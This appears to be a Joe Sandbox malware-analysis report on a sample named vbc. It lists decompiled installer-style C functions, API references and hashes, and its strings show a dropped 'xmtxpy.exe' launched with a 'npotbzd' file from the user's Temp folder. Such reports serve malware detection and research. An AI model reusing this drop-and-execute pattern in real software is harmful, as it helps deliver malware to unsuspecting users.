                          0x00000000
                          0x00000000
                          0x00404c0c
                          0x00404c0c
                          0x00404c0c
                          0x00404c0f
                          0x00404c12
                          0x00404c14
                          0x00404c14
                          0x00404c14
                          0x00404c15
                          0x00404c16
                          0x00404c16
                          0x00000000
                          0x00404c0c
                          0x00404bef
                          0x00404bd3
                          0x00404b0a
                          0x00404b10
                          0x00000000
                          0x00000000
                          0x00404b1c
                          0x00404b20
                          0x00000000
                          0x00000000
                          0x00404b30
                          0x00404b32
                          0x00404b35
                          0x00000000
                          0x00000000
                          0x00404b47
                          0x00404b49
                          0x00404b4c
                          0x00404b56
                          0x00404b58
                          0x00404b59
                          0x00404b5a
                          0x00404b69
                          0x00404b6b
                          0x00404b72
                          0x00404b75
                          0x00000000
                          0x00404b75
                          0x00404b4e
                          0x00404b51
                          0x00404b54
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404b54
                          0x00000000
                          0x00404a14
                          0x004047c6
                          0x004047cb
                          0x004047d0
                          0x004047d5
                          0x004047d6
                          0x004047df
                          0x004047ea
                          0x004047f5
                          0x004047fb
                          0x00404809
                          0x0040481e
                          0x00404823
                          0x0040482e
                          0x00404837
                          0x0040484c
                          0x0040485d
                          0x0040486a
                          0x0040486a
                          0x0040486f
                          0x00404875
                          0x00404877
                          0x0040487a
                          0x0040487f
                          0x00404884
                          0x00404886
                          0x00404886
                          0x004048a6
                          0x004048a6
                          0x004048a8
                          0x004048a9
                          0x004048ae
                          0x004048b1
                          0x004048b4
                          0x004048b8
                          0x004048bd
                          0x004048c2
                          0x004048c6
                          0x004048cb
                          0x004048d0
                          0x004048d2
                          0x004048d4
                          0x004048da
                          0x004049a4
                          0x004049b7
                          0x00000000
                          0x004048e0
                          0x004048e3
                          0x004048e6
                          0x004048e9
                          0x004048e9
                          0x004048ef
                          0x004048f5
                          0x004048f8
                          0x004048fe
                          0x004048ff
                          0x00404904
                          0x0040490d
                          0x00404914
                          0x00404917
                          0x0040491a
                          0x0040491d
                          0x00404957
                          0x00404959
                          0x00404982
                          0x0040495b
                          0x00404968
                          0x00404968
                          0x0040491f
                          0x00404922
                          0x00404931
                          0x0040493b
                          0x00404943
                          0x0040494a
                          0x00404952
                          0x00404952
                          0x0040491d
                          0x00404988
                          0x00404989
                          0x0040498f
                          0x00404995
                          0x00404995
                          0x004049a2
                          0x004049bd
                          0x004049c1
                          0x004049de
                          0x004049e3
                          0x004049e6
                          0x004049e6
                          0x00000000
                          0x004049c3
                          0x004049c8
                          0x004049d1
                          0x00404d5e
                          0x00404d70
                          0x00404d70
                          0x004049c1
                          0x00000000
                          0x004049a2
                          0x004048da

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                          • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404275 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x8c223a
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x8c0fa0
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                          0x0040427b
                          0x00404282
                          0x0040428e
                          0x0040429c
                          0x004042a4
                          0x004042a8
                          0x004042ae
                          0x004042ae
                          0x004042ba
                          0x0040432e
                          0x00404335
                          0x0040440a
                          0x00404411
                          0x00404420
                          0x00404420
                          0x00404424
                          0x0040442a
                          0x00404437
                          0x00404439
                          0x00404439
                          0x00404447
                          0x0040444c
                          0x0040444f
                          0x00404456
                          0x00404459
                          0x00404490
                          0x00404492
                          0x00404498
                          0x0040449f
                          0x004044a1
                          0x004044a1
                          0x004044bd
                          0x004044f9
                          0x00000000
                          0x004044bf
                          0x004044c2
                          0x004044d6
                          0x004044d8
                          0x00000000
                          0x004044d8
                          0x0040445b
                          0x0040445f
                          0x0040448e
                          0x0040448e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404461
                          0x00404461
                          0x0040446e
                          0x00404473
                          0x00000000
                          0x00000000
                          0x00404477
                          0x00404479
                          0x00404479
                          0x00404484
                          0x00404487
                          0x0040448c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040448c
                          0x004044e7
                          0x004044ee
                          0x004044f5
                          0x004044fc
                          0x004044fc
                          0x00404501
                          0x00404503
                          0x0040450b
                          0x00404511
                          0x00404511
                          0x00404518
                          0x00404521
                          0x0040452b
                          0x00404533
                          0x00404549
                          0x00404535
                          0x00404539
                          0x00404539
                          0x00404533
                          0x0040454e
                          0x00404553
                          0x00404558
                          0x00404561
                          0x00404561
                          0x0040456a
                          0x0040456c
                          0x0040456c
                          0x00404578
                          0x00404580
                          0x0040458a
                          0x0040458a
                          0x0040458f
                          0x00000000
                          0x0040458f
                          0x00404459
                          0x00404413
                          0x0040441a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040441a
                          0x0040433b
                          0x00404341
                          0x0040435b
                          0x00404360
                          0x0040436a
                          0x00404371
                          0x00404380
                          0x00404383
                          0x00404386
                          0x0040438d
                          0x00404395
                          0x00404398
                          0x0040439c
                          0x004043a3
                          0x004043ab
                          0x00404403
                          0x004043ad
                          0x004043ae
                          0x004043b5
                          0x004043ba
                          0x004043bf
                          0x004043c7
                          0x004043d4
                          0x004043e8
                          0x004043ec
                          0x004043ec
                          0x004043e8
                          0x004043f1
                          0x004043fc
                          0x004043fc
                          0x004043ab
                          0x00000000
                          0x00404360
                          0x0040434e
                          0x00000000
                          0x00000000
                          0x00404354
                          0x00000000
                          0x004042bc
                          0x004042bc
                          0x004042c8
                          0x004042d2
                          0x004042df
                          0x004042df
                          0x004042e5
                          0x004042ee
                          0x004042f7
                          0x004042fa
                          0x004042fd
                          0x00404305
                          0x00404308
                          0x0040430b
                          0x00404313
                          0x0040431a
                          0x00404321
                          0x00404595
                          0x004045a7
                          0x004045a7
                          0x0040432c
                          0x00000000
                          0x0040432c

                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 004042C1
                          • SetWindowTextA.USER32(?,?), ref: 004042EE
                          • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                          • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00420498,00000000,?,?), ref: 004043E0
                          • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd), ref: 004043EC
                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004043FC
                            • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?), ref: 00405D5D
                          • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                          • MulDiv.KERNEL32 ref: 004044D0
                          • SetDlgItemTextA.USER32(00000000,00000400,0041F450), ref: 00404549
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                          • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                          • API String ID: 2246997448-3263883584
                          • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                          • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405AA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x8c223a
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x8c1cb8
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x74631528
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}































                          0x00405aa7
                          0x00405aa7
                          0x00405aa7
                          0x00405aad
                          0x00405ab2
                          0x00405ab4
                          0x00405ac3
                          0x00405ac3
                          0x00405ac5
                          0x00405ace
                          0x00405ad0
                          0x00405ad5
                          0x00405ad8
                          0x00405ad9
                          0x00405ae0
                          0x00405ae2
                          0x00405ae8
                          0x00405aeb
                          0x00405aeb
                          0x00405cc0
                          0x00405cc0
                          0x00405cc4
                          0x00000000
                          0x00000000
                          0x00405af8
                          0x00405afe
                          0x00000000
                          0x00000000
                          0x00405b04
                          0x00405b05
                          0x00405b08
                          0x00405b0b
                          0x00405cb3
                          0x00405cbd
                          0x00405cbf
                          0x00405cbf
                          0x00405cb5
                          0x00405cb7
                          0x00405cb9
                          0x00405cba
                          0x00405cba
                          0x00000000
                          0x00405cb3
                          0x00405b11
                          0x00405b15
                          0x00405b1a
                          0x00405b29
                          0x00405b2c
                          0x00405b2e
                          0x00405b33
                          0x00405b36
                          0x00405b39
                          0x00405b3c
                          0x00405b3f
                          0x00405b42
                          0x00405c5d
                          0x00405c60
                          0x00405c90
                          0x00405c93
                          0x00405c98
                          0x00405c9c
                          0x00405c9c
                          0x00405ca1
                          0x00405ca2
                          0x00405ca7
                          0x00405caa
                          0x00405cac
                          0x00000000
                          0x00405cac
                          0x00405c62
                          0x00405c65
                          0x00405c7a
                          0x00405c81
                          0x00405c67
                          0x00405c6e
                          0x00405c6e
                          0x00405c89
                          0x00405c8c
                          0x00405c55
                          0x00405c56
                          0x00405c56
                          0x00000000
                          0x00405c8c
                          0x00405b4a
                          0x00405b4b
                          0x00405b51
                          0x00405b53
                          0x00405b6d
                          0x00405b6d
                          0x00405b74
                          0x00405b74
                          0x00405b7b
                          0x00405b7f
                          0x00405b7f
                          0x00405b80
                          0x00405b82
                          0x00405bbb
                          0x00405bbe
                          0x00405bce
                          0x00405bd1
                          0x00405bd9
                          0x00405bdf
                          0x00405bdf
                          0x00405c3b
                          0x00405c3b
                          0x00405c3d
                          0x00000000
                          0x00000000
                          0x00405be3
                          0x00405bea
                          0x00405beb
                          0x00405bed
                          0x00405c07
                          0x00405c15
                          0x00405c1b
                          0x00405c1d
                          0x00405c38
                          0x00405c38
                          0x00405c38
                          0x00000000
                          0x00405c38
                          0x00405c23
                          0x00405c2e
                          0x00405c34
                          0x00405c36
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c36
                          0x00405bef
                          0x00405bf2
                          0x00000000
                          0x00000000
                          0x00405c01
                          0x00405c03
                          0x00405c05
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c05
                          0x00000000
                          0x00405c3b
                          0x00405bc6
                          0x00000000
                          0x00405b84
                          0x00405b89
                          0x00405b9f
                          0x00405ba4
                          0x00405ba7
                          0x00405c44
                          0x00405c44
                          0x00405c48
                          0x00405c50
                          0x00405c50
                          0x00000000
                          0x00405c48
                          0x00405bb1
                          0x00405c3f
                          0x00405c3f
                          0x00405c42
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405c42
                          0x00405b82
                          0x00405b55
                          0x00405b59
                          0x00000000
                          0x00000000
                          0x00405b5b
                          0x00405b5f
                          0x00000000
                          0x00000000
                          0x00405b61
                          0x00405b65
                          0x00000000
                          0x00405b67
                          0x00405b67
                          0x00000000
                          0x00405b67
                          0x00405b65
                          0x00405cca
                          0x00405cd4
                          0x00405ce0
                          0x00405ce0
                          0x00000000

                          APIs
                          • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                          • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000400), ref: 00405BC6
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000400), ref: 00405BD9
                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                          • SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd), ref: 00405C23
                          • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 900638850-648608478
                          • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                          • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                          • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
